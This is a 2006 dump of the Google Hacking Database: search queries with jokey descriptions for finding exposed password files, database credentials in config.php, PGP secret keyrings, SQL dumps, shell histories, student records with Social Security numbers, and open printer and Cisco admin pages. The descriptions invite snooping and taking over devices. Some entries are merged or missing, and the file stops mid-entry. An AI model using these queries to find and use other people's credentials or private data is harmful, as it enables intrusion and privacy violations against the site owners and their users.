### GHDB.TXT ### 22/06/2006 [[start][1] [[title]Squid cache server reports[[title]] [[descr]These are squid server cache reports. Fairly benign, really, except when you consider using them for evil purposes. For example, an institution stands up a proxy server for their internal users to get to the outside world. Then, the internal users surf all over to their hearts' content (including intranet pages cuz, well, the admins are stupid). Voila, intranet links show up in the external cache report. Want to make matters worse for yourself as an admin? OK, configure your external proxy server as a trusted internal host. Load up your web browser, set your proxy as their proxy and surf your way into their intranet. Not that I've noticed any examples of this in this google list. *COUGH* *COUGH* *COUGH* unresolved DNS lookups give clues *COUGH* *COUGH* ('scuse me. must be a furball) OK, let's say BEST CASE scenario. Let's say there are no security problems revealed in these logs. Best case scenario is that outsiders can see what your company/agency/workers are surfing. [descr]] [[url]http://www.google.com/search?q=%22cacheserverreport+for%22+%22This+analysis+was+produced+by+calamaris%22[url]] [[dork]"cacheserverreport for" "This analysis was produced by calamaris"[dork]] [end][1]] [[start][2] [[title]Ganglia Cluster Reports[[title]] [[descr]These are server cluster reports, great for info gathering. Let's see, what were those server names again?[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Ganglia%22+%22Cluster+Report+for%22[url]] [[dork]intitle:"Ganglia" "Cluster Report for"[dork]] [end][2]] [[start][3] [[title]ICQ chat logs, please...[[title]] [[descr]ICQ (http://www.icq.com) allows you to store the contents of your online chats into a file. These folks have their entire ICQ directories online. 
On purpose?[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+dbconvert%2Eexe+chats[url]] [[dork]intitle:"Index of" dbconvert.exe chats[dork]] [end][3]] [[start][4] [[title]Apache online documentation[[title]] [[descr]When you install the Apache web server, you get a nice set of online documentation. When you learn how to use Apache, you're supposed to delete these online Apache manuals. These sites didn't. If they're in such a hurry with Apache installs, I wonder what else they rushed through?[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Apache+HTTP+Server%22+intitle%3A%22documentation%22[url]] [[dork]intitle:"Apache HTTP Server" intitle:"documentation"[dork]] [end][4]] [[start][5] [[title]Coldfusion Error Pages[[title]] [[descr]These aren't too horribly bad, but there are SO MANY of them. These sites got googlebotted while the site was having "technical difficulties." The resulting cached error message gives lots of juicy tidbits about the target site.[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Error+Diagnostic+Information%22+intitle%3A%22Error+Occurred+While%22+[url]] [[dork]"Error Diagnostic Information" intitle:"Error Occurred While" [dork]] [end][5]] [[start][6] [[title]Financial spreadsheets: finance.xls[[title]] [[descr]"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+finance.xls[url]] [[dork]intitle:"Index of" finance.xls[dork]] [end][6]] [[start][7] [[title]Financial spreadsheets: finances.xls[[title]] [[descr]"Hey! I have a great idea! 
Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+finances.xls[url]] [[dork]intitle:"Index of" finances.xls[dork]] [end][7]] [[start][8] [[title]SQL data dumps[[title]] [[descr]SQL database dumps. LOTS of data in these. So much data, in fact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database. What's that? Usernames and passwords, you say? Patience, grasshopper.....[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22%23+Dumping+data+for+table%22[url]] [[dork]"# Dumping data for table"[dork]] [end][8]] [[start][9] [[title]bash_history files[[title]] [[descr]Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations...[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+%2Ebash%5Fhistory[url]] [[dork]intitle:"Index of" .bash_history[dork]] [end][9]] [[start][10] [[title]sh_history files[[title]] [[descr]Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. 
I just got bored with all the combinations...[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+.sh_history[url]] [[dork]intitle:"Index of" .sh_history[dork]] [end][10]] [[start][11] [[title]mysql history files[[title]] [[descr]The .mysql_history file contains commands that were performed against a mysql database. A "history" of said commands. First, you shouldn't show this file to anyone, especially not a MAJOR SEARCH ENGINE! Secondly, I sure hope you wouldn't type anything sensitive while interacting with your databases, like oh say USERNAMES AND PASSWORDS...[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+%2Emysql%5Fhistory[url]] [[dork]intitle:"Index of" .mysql_history[dork]] [end][11]] [[start][12] [[title]mt-db-pass.cgi files[[title]] [[descr]These folks had the technical prowess to unpack the movable type files, but couldn't manage to set up their web servers properly. Check the mt.cfg files for interesting stuffs...[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+mt%2Ddb%2Dpass%2Ecgi[url]] [[dork]intitle:"Index of" mt-db-pass.cgi[dork]] [end][12]] [[start][13] [[title]Windows 2000 Internet Services[[title]] [[descr]At first glance, this search reveals even more examples of operating system users enabling the operating system default web server software. This is generally accepted to be a Bad Idea(TM) as mentioned in the previous example. However, the googleDork index on this particular category gets quite a boost from the fact that this particular screen should NEVER be seen by the general public. To quote the default index screen: "Any users attempting to connect to this site are currently receiving an 'Under Construction page'" THIS is not the 'Under Construction page.' I was only able to generate this screen while sitting at the console of the server. 
The fact that this screen is revealed to the general public may indicate a misconfiguration of a much more insidious nature...[descr]] [[url]http://www.google.com/search?q=intitle:%22Welcome+to+Windows+2000+Internet+Services%22&num=100&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]intitle:"Welcome to Windows 2000 Internet Services"[dork]] [end][13]] [[start][14] [[title]IIS 4.0[[title]] [[descr]Moving from personal, lightweight web servers into more production-ready software, we find that even administrators of Microsoft's Internet Information Server (IIS) sometimes don't have a clue what they're doing. By searching on web pages with titles of "Welcome to IIS 4.0" we find that even if they've taken the time to change their main page, some dorks forget to change the titles of their default-installed web pages. This is an indicator that their web server is most likely running, or was upgraded from, the now considered OLD IIS 4.0 and that at least portions of their main pages are still exactly the same as they were out of the box. Conclusion? The rest of the factory-installed stuff is most likely lingering around on these servers as well.

Old code: FREE with operating system.
Poor content management: an average of $40/hour.
Factory-installed default scripts: FREE with operating system.
Getting hacked by a script kiddie that found you on Google: PRICELESS.

For all the things money can't buy, there's a googleDork award.[descr]] [[url]http://www.google.com/search?q=intitle:%22Welcome+to+IIS+4.0%22&num=100&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]intitle:"Welcome to IIS 4.0"[dork]] [end][14]] [[start][15] [[title]Look in my backup directories! Please?[[title]] [[descr]Backup directories are often very interesting places to explore. More than one server has been compromised by a hacker's discovery of sensitive information contained in backup files or directories. Some of the sites in this search meant to reveal the contents of their backup directories, others did not. Think about it. What's in YOUR backup directories? Would you care to share the contents with the whole of the online world? Probably not. Whether intentional or not, bsp.gsa.gov reveals a backup directory through Google. Is this simply yet another misconfigured .gov site? You decide. BSP stands for "best security practices," winning this site the Top GoogleDork award for this category.[descr]] [[url]http://www.google.com/search?q=%22Index+of+/backup%22&num=100&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]"Index of /backup"[dork]] [end][15]] [[start][16] [[title]OpenBSD running Apache[[title]] [[descr]I like the OpenBSD operating system. I really do. And I like the Apache web server software. Honestly. I admire the mettle of administrators who take the time to run quality, secure software. The problem is that you never know when security problems will pop up. A BIG security problem popped up within the OpenBSD/Apache combo. Now, every administrator that advertised this particular combo with cute little banners has a problem. Hackers can find them with Google. I go easy on these folks since the odds are they've patched their sites already. 
Then again, they may just show up on zone-h.[descr]] [[url]http://www.google.com/search?sourceid=navclient&q=%22powered+by+openbsd%22+%2B%22powered+by+apache%22[url]] [[dork]"powered by openbsd" +"powered by apache"[dork]] [end][16]] [[start][17] [[title]intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"[title]] [[descr]PGP is a great encryption technology. It keeps secrets safe. Everyone from drug lords to the head of the DEA can download PGP to encrypt their sensitive documents. Everyone, that is, except googleDorks. GoogleDorks, it seems, don't understand that anyone in possession of your private keyring (secring) can get to your secret stuff. It should never be given out, and should certainly not be posted on the Internet. The highest ranking is awarded for this surprising level of ineptitude.[descr]] [[url]http://www.google.com/search?q=intitle:index.of+intext:%22secring.skr%22%7C%22secring.pgp%22%7C%22secring.bak%22[url]] [[dork]intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"[dork]] [end][17]] [[start][20] [[title]master.passwd[[title]] [[descr]There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show "master.passwd" files which contain encrypted passwords which may look like this: "guest MMCHhvZ6ODgFo". A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!

For master.passwd, be sure to check other files in the same directory...[descr]] [[url]http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+master%2Epasswd[url]] [[dork]intitle:"Index of" master.passwd[dork]] [end][20]] [[start][21] [[title]pwd.db[[title]] [[descr]There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show "pwd.db" files which contain encrypted passwords which may look like this: "guest MMCHhvZ6ODgFo". A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show![descr]] [[url]http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+pwd%2Edb[url]] [[dork]intitle:"Index of" pwd.db[dork]] [end][21]] [[start][22] [[title]htpasswd / htpasswd.bak[[title]] [[descr]There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of%22+%22.htpasswd%22+htpasswd.bak[url]] [[dork]intitle:"Index of" ".htpasswd" htpasswd.bak[dork]] [end][22]] [[start][23] [[title]htpasswd / htgroup[[title]] [[descr]There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!

You'll need to sift through these results a bit...[descr]] [[url]http://www.google.com/search?q=intitle:%22Index+of%22+%22.htpasswd%22+%22htgroup%22++-intitle:%22dist%22+-apache+-htpasswd.c&hl=en&lr=&ie=UTF-8&safe=off&start=10&sa=N[url]] [[dork]intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c[dork]] [end][23]] [[start][24] [[title]spwd.db / passwd[[title]] [[descr]There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show![descr]] [[url]http://www.google.com/search?q=intitle:%22Index+of%22+spwd.db+passwd+-pam.conf&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=10&sa=N[url]] [[dork]intitle:"Index of" spwd.db passwd -pam.conf[dork]] [end][24]] [[start][25] [[title]passwd / etc (reliable)[[title]] [[descr]There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of..etc%22+passwd[url]] [[dork]intitle:"Index of..etc" passwd[dork]] [end][25]] [[start][26] [[title]AIM buddy lists[[title]] [[descr]These searches bring up common names for AOL Instant Messenger "buddylists". These lists contain screen names of your "online buddies" in Instant Messenger. Now, that's not too terribly exciting or stupid unless you want to mess with someone's mind, and besides, some people make these public on purpose. The interesting things are the files that get stored ALONG WITH buddylists. Often this stuff includes downloaded pictures, resumes, all sorts of things. 
This is really for the peepers out there, and it's possible to spend countless hours rifling through people's personal crap.

A few methods:
1. buddylist.blt
2. buddy.blt
3. buddies.blt[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=buddylist%2Eblt[url]] [[dork]buddylist.blt[dork]] [end][26]] [[start][27] [[title]config.php[[title]] [[descr]This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. Way to go, googleDorks!![descr]] [[url]http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+config%2Ephp[url]] [[dork]intitle:"Index of" config.php[dork]] [end][27]] [[start][28] [[title]phpinfo()[[title]] [[descr]This brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! I mean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apache env vars, *sigh* the list goes on and on! Thanks "joe!" =)[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3Aphpinfo+%22PHP+Version%22&btnG=Search[url]] [[dork]intitle:phpinfo "PHP Version"[dork]] [end][28]] [[start][29] [[title]MYSQL error message: supplied argument....[[title]] [[descr]One of many potential error messages that spew interesting information. The results of this message give you real path names inside the webserver as well as more php scripts for potential "crawling" activities.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&q=%22supplied+argument+is+not+a+valid+MySQL+result+resource%22[url]] [[dork]"supplied argument is not a valid MySQL result resource"[dork]] [end][29]] [[start][30] [[title]The Master List[[title]] [[descr]Click on any of the following links to show Google's list!
_vti_inf.html (694 hits)
service.pwd (11,800 hits)
users.pwd (23 hits)
authors.pwd (22 hits)
administrators.pwd (22 hits)
shtml.dll (780 hits)
shtml.exe (761 hits)
fpcount.exe (1,370 hits)
default.asp (2,170 hits)
showcode.asp (4 hits)
sendmail.cfm (5 hits)
getFile.cfm (7 hits)
imagemap.exe (510 hits)
test.bat (353 hits)
msadcs.dll (8 hits)
htimage.exe (513 hits)
counter.exe (164 hits)
browser.inc (11 hits)
hello.bat (18 hits)
dvwssr.dll (571 hits)
cart32.exe (9 hits)
add.exe (38 hits)
index.JSP (998 hits)
index.jsp (998 hits)
SessionServlet (46 hits)
shtml.dll (780 hits)
index.cfm (473 hits)
page.cfm (5 hits)
shtml.exe (761 hits)
web_store.cgi (16 hits)
shop.cgi (63 hits)
upload.asp (27 hits)
default.asp (2,170 hits)
pbserver.dll (6 hits)
phf (370 hits)
test-cgi (1,560 hits)
finger (23,900 hits)
Count.cgi (8,710 hits)
jj (5,600 hits)
php.cgi (170 hits)
php (48,000 hits)
nph-test-cgi (132 hits)
handler (9,220 hits)
webdist.cgi (35 hits)
webgais (37 hits)
websendmail (12 hits)
faxsurvey (27 hits)
htmlscript (50 hits)
perl.exe (340 hits)
wwwboard.pl (455 hits)
www-sql (26,500 hits)
view-source (641 hits)
campas (94 hits)
aglimpse (12 hits)
glimpse (4,530 hits)
man.sh (127 hits)
AT-admin.cgi (789 hits)
AT-generate.cgi (14 hits)
filemail.pl (5 hits)
maillist.pl (16 hits)
info2www (737 hits)
files.pl (267 hits)
bnbform.cgi (91 hits)
survey.cgi (93 hits)
classifieds.cgi (25 hits)
wrap (14,000 hits)
cgiwrap (1,270 hits)
edit.pl (114 hits)
perl (80,700 hits)
names.nsf (12 hits)
webgais (37 hits)
dumpenv.pl (7 hits)
test.cgi (1,560 hits)
submit.cgi (79 hits)
guestbook.cgi (528 hits)
guestbook.pl (451 hits)
cachemgr.cgi (25 hits)
responder.cgi (4 hits)
perlshop.cgi (30 hits)
query (15,500 hits)
w3-msql (877 hits)
plusmail (12 hits)
htsearch (177 hits)
infosrch.cgi (19 hits)
publisher (2,610 hits)
ultraboard.cgi (24 hits)
db.cgi (96 hits)
formmail.cgi (420 hits)
allmanage.pl (5 hits)
ssi (9,550 hits)
adpassword.txt (39 hits)
redirect.cgi (60 hits)
f (124,000 hits)
cvsweb.cgi (78 hits)
login.jsp (241 hits)
dbconnect.inc (18 hits)
admin (57,000 hits)
htgrep (30 hits)
wais.pl (133 hits)
amadmin.pl (14 hits)
subscribe.pl (65 hits)
news.cgi (387 hits)
auctionweaver.pl (2 hits)
.htpasswd (2,390 hits)
acid_main.php (3 hits)
access_log (1,250 hits)
access-log (618 hits)
access.log (618 hits)
log.htm (386 hits)
log.html (1,310 hits)
log.txt (987 hits)
logfile (23,200 hits)
logfile.htm (76 hits)
logfile.html (671 hits)
logfile.txt (701 hits)
logger.html (37 hits)
stat.htm (398 hits)
stats.htm (687 hits)
stats.html (1,840 hits)
stats.txt (342 hits)
webaccess.htm (11 hits)
wwwstats.html (80 hits)
source.asp (11 hits)
perl (80,700 hits)
mailto.cgi (46 hits)
YaBB.pl (35 hits)
mailform.pl (670 hits)
cached_feed.cgi (6 hits)
cr (27,500 hits)
global.cgi (14 hits)
Search.pl (548 hits)
build.cgi (74 hits)
common.php (184 hits)
show (33,500 hits)
global.inc (114 hits)
ad.cgi (21 hits)
WSFTP.LOG (11 hits)
index.html~ (81,100 hits)
index.php~ (6,740 hits)
index.html.bak (690 hits)
index.php.bak (69 hits)
print.cgi (61 hits)
register.cgi (172 hits)
webdriver (35 hits)
bbs_forum.cgi (45 hits)
mysql.class (21 hits)
sendmail.inc (97 hits)
CrazyWWWBoard.cgi (68 hits)
search.pl (548 hits)
way-board.cgi (44 hits)
webpage.cgi (89 hits)
pwd.dat (22 hits)
adcycle (12 hits)
post-query (240 hits)
help.cgi (69 hits)
[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Index+of%22+_vti_inf.html[url]]

Have a look at the robots.txt file itself; it contains interesting stuff.

However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server![descr]] [[url]http://www.google.com/search?q=intitle:Index.of+robots.txt&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=10&sa=N[url]] [[dork]intitle:Index.of robots.txt[dork]] [end][31]] [[start][32] [[title]passlist[[title]] [[descr]I'm not sure what uses this, but the passlist and passlist.txt files contain passwords in CLEARTEXT! That's right, no decoding/decrypting/encrypting required. How easy is this?

*sigh*

Supreme googledorkage[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3Aindex.of+passlist[url]] [[dork]intitle:index.of passlist[dork]] [end][32]] [[start][33] [[title]secret[[title]] [[descr]What kinds of goodies lurk in directories marked as "secret?" Find out...[descr]] [[url]http://www.google.com/search?q=intitle:index.of.secret&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&sa=N[url]] [[dork]intitle:index.of.secret[dork]] [end][33]] [[start][34] [[title]private[[title]] [[descr]What kinds of things might you find in directories marked "private?" Let's find out...[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof%2Eprivate[url]] [[dork]intitle:index.of.private[dork]] [end][34]] [[start][35] [[title]etc (index.of)[[title]] [[descr]This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3Aindex.of.etc[url]] [[dork]intitle:index.of.etc[dork]] [end][35]] [[start][36] [[title]winnt[[title]] [[descr]The \WINNT directory is the directory that Windows NT is installed into by default. Now just because Google can find them, this doesn't necessarily mean that these are Windows NT directories that made their way onto the web. However, sometimes this happens. Other times, they aren't Windows NT directories, but backup directories for Windows NT data. Either way, worthy of a nomination.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3Aindex.of.winnt[url]] [[dork]intitle:index.of.winnt[dork]] [end][36]] [[start][37] [[title]secure[[title]] [[descr]What could be hiding in directories marked as "secure?" 
Let's find out...[descr]] [[url]http://www.google.com/search?q=intitle:%22index.of.secure%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&sa=N[url]] [[dork]intitle:"index.of.secure"[dork]] [end][37]] [[start][38] [[title]protected[[title]] [[descr]What could be in a directory marked as "protected?" Let's find out...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Aindex.of.protected&btnG=Google+Search[url]] [[dork]inurl:index.of.protected[dork]] [end][38]] [[start][39] [[title]index.of.password[[title]] [[descr]These directories are named "password." I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named "password" and single html files inside named things like "horny.htm" or "brittany.htm." These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...)[descr]] [[url]http://www.google.com/search?q=inurl:index.of.password&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&sa=N[url]] [[dork]inurl:index.of.password[dork]] [end][39]] [[start][40] [[title]"This report was generated by WebLog"[title]] [[descr]These are weblog-generated statistics for web sites... A roadmap of files, referrers, errors, statistics... yummy... a smorgasbord! =P[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22This+report+was+generated+by+WebLog%22[url]] [[dork]"This report was generated by WebLog"[dork]] [end][40]] [[start][41] [[title]"produced by getstats"[title]] [[descr]Another web statistics package. This one originated from a Google scan of an Ivy League college. *sigh*

There's sooo much stuff in here![descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22These+statistics+were+produced+by+getstats%22[url]] [[dork]"These statistics were produced by getstats"[dork]] [end][41]] [[start][42] [[title]"generated by wwwstat"[title]] [[descr]More www statistics on the web. This one is very nice. Lots of directory info, client access statistics, email addresses... lots of good stuff.

You know, these are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...

thanks, sac =)[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22This+summary+was+generated+by+wwwstat%22[url]] [[dork]"This summary was generated by wwwstat"[dork]] [end][42]] [[start][43] [[title]haccess.ctl (one way)[[title]] [[descr]This is the frontpage(?) equivalent of htaccess, I believe. Anyhow, this file describes who can access the directory of the web server and where the other authorization files are. Nice find.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof+haccess%2Ectl[url]] [[dork]intitle:index.of haccess.ctl[dork]] [end][43]] [[start][44] [[title]haccess.ctl (VERY reliable)[[title]] [[descr]haccess.ctl is the frontpage(?) equivalent of the .htaccess file. Either way, this file describes who can access a web page, and should not be shown to web surfers. Way to go, googledork. =P

This method is very reliable due to the use of this google query:

filetype:ctl Basic

This pulls out the file by name, then searches for a string inside of it (Basic) which appears in the standard template for this file.[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=filetype%3Ahtaccess+Basic[url]] [[dork]filetype:htaccess Basic[dork]] [end][44]] [[start][45] [[title]filetype:xls username password email[[title]] [[descr]This search shows Microsoft Excel spreadsheets containing the words username, password and email. Beware that there are a ton of blank "template" forms to weed through, but you can tell from the Google summary that some of these are winners... err, losers... depending on your perspective.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Axls+username+password+email[url]] [[dork]filetype:xls username password email[dork]] [end][45]] [[start][46] [[title]Hassan Consulting's Shopping Cart Version 1.18[[title]] [[descr]These servers can be messed with in many ways. One specific way is by way of the "../" bug. This lets you cruise around the web server in a somewhat limited fashion.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Ashop+%22Hassan+Consulting%27s+Shopping+Cart+Version+1%2E18%22[url]] [[dork]inurl:shop "Hassan Consulting's Shopping Cart Version 1.18"[dork]] [end][46]] [[start][47] [[title]site:edu admin grades[[title]] [[descr]I never really thought about this until I started coming up with juicy examples for DEFCON 11. A few GLARINGLY bad examples contain not only student grades and names, but also Social Security numbers, securing the highest of all googledork ratings![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=site%3Aedu+grades+admin[url]] [[dork]site:edu grades admin[dork]] [end][47]] [[start][48] [[title]auth_user_file.txt[[title]] [[descr]DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program!!!). 
Some lists are bigger than others, all are fun, and all belong to googledorks. =)[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=allinurl%3Aauth_user_file.txt[url]] [[dork]allinurl:auth_user_file.txt[dork]] [end][48]] [[start][49] [[title]inurl:config.php dbuname dbpass[[title]] [[descr]The old config.php script. This puppy should be held very closely. It should never be viewable to your web visitors because it contains CLEARTEXT usernames and passwords!
The highest of all googledorks ratings![descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=inurl%3Aconfig%2Ephp+dbuname+dbpass[url]] [[dork]inurl:config.php dbuname dbpass[dork]] [end][49]] [[start][50] [[title]inurl:tech-support inurl:show Cisco[[title]] [[descr]This is a way to find Cisco products with an open web interface. These are generally supposed to be username and password protected. Google finds ones that aren't. Be sure to use Google's cache if you have trouble connecting. Also, there are very few results (2 at the time of posting).[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=inurl%3Atech%2Dsupport+inurl%3Ashow+Cisco[url]] [[dork]inurl:tech-support inurl:show Cisco[dork]] [end][50]] [[start][51] [[title]index_i.shtml Ready (Xerox printers on the web!)[[title]] [[descr]These printers are not only web-enabled, but their management interface somehow got crawled by Google! These puppies should not be public! You can really muck with these printers. In some cases, going to the "password.shtml" page, you can even lock out the admins if a username and password have not already been set! Thanks to mephisteau@yahoo.co.uk for the idea =)[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=i%5Findex%2Eshtml+%22Ready%22[url]] [[dork]i_index.shtml "Ready"[dork]] [end][51]] [[start][52] [[title]aboutprinter.shtml (More Xerox printers on the web!)[[title]] [[descr]More Xerox printers on the web! Google found these printers. Should their management interface be open to the WHOLE INTERNET? I think not.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=aboutprinter.shtml&btnG=Google+Search[url]] [[dork]aboutprinter.shtml[dork]] [end][52]] [[start][53] [[title]"Chatologica MetaSearch" "stack tracking"[title]] [[descr]There is soo much crap in this error message... 
Apache version, CGI environment vars, path names, stack-freaking-dumps, process IDs, Perl version, yadda yadda yadda...[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Chatologica+MetaSearch%22+%22stack+tracking%3A%22[url]] [[dork]"Chatologica MetaSearch" "stack tracking:"[dork]] [end][53]] [[start][54] [[title]mystuff.xml - Trillian data files[[title]] [[descr]This particular file contains web links that Trillian users have entered into the tool. Trillian combines many different messaging programs into one tool: AIM, MSN, Yahoo, ICQ, IRC, etc. Although this particular file is fairly benign, check out the other files in the same directory. There is usually great stuff here![descr]] [[url]http://www.google.com/search?q=mystuff.xml+intitle:%22index+of%22[url]] [[dork]mystuff.xml intitle:"index of"[dork]] [end][54]] [[start][55] [[title]trillian.ini[[title]] [[descr]Trillian pulls together all sorts of messaging clients like AIM, MSN, Yahoo, IRC, ICQ, etc. The various ini files that Trillian uses include files like aim.ini and msn.ini. These ini files contain encoded passwords, usernames, buddy lists, and all sorts of other fun things. Thanks for putting these on the web for us, googledorks![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22index+of%22+trillian.ini[url]] [[dork]intitle:"index of" trillian.ini[dork]] [end][55]] [[start][56] [[title]intitle:admin intitle:login[[title]] [[descr]Admin Login pages. Now, the existence of this page does not necessarily mean a server is vulnerable, but it sure is handy to let Google do the discovering for you, no? 
